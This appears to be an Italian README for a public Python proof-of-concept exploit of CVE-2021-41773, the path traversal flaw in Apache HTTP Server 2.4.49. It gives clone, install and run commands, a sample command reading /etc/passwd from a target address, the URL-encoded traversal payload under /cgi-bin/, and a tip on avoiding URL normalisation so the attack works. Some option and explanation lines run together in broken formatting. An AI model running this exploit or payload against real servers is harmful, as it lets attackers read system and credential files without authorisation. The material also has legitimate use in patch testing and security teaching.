
Exploit Python per CVE-2021-41773 - Vulnerabilità Path Traversal in Apache HTTP Server 2.4.49
Un exploit Python per CVE-2021-41773, una vulnerabilità di path traversal in Apache HTTP Server 2.4.49 che consente di leggere file arbitrari dal server.
CVE-2021-41773 è una vulnerabilità di path traversal in Apache HTTP Server 2.4.49 che si verifica a causa di una convalida impropria dei percorsi forniti dall'utente. La vulnerabilità consente agli aggressori di leggere file al di fuori della root dei documenti utilizzando sequenze di path traversal codificate in URL.
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt
python3 cve-2021-41773.py -t <target> -f <file_path>
-t, --target: URL del target (includi protocollo e porta se necessario)-f, --file: Percorso del file da leggere dal server# Leggi /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

L'exploit utilizza sequenze di path traversal codificate in URL (.%2e/%2e%2e/) per bypassare la convalida del percorso di Apache:
.%2e) bypassano i controlli di sicurezza inizialiLa chiave è utilizzare urllib3.PoolManager() invece di requests.get() per impedire la normalizzazione automatica dell'URL che romperebbe l'exploit.
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}
Questo si traduce in:
/cgi-bin/../../../../{target_file}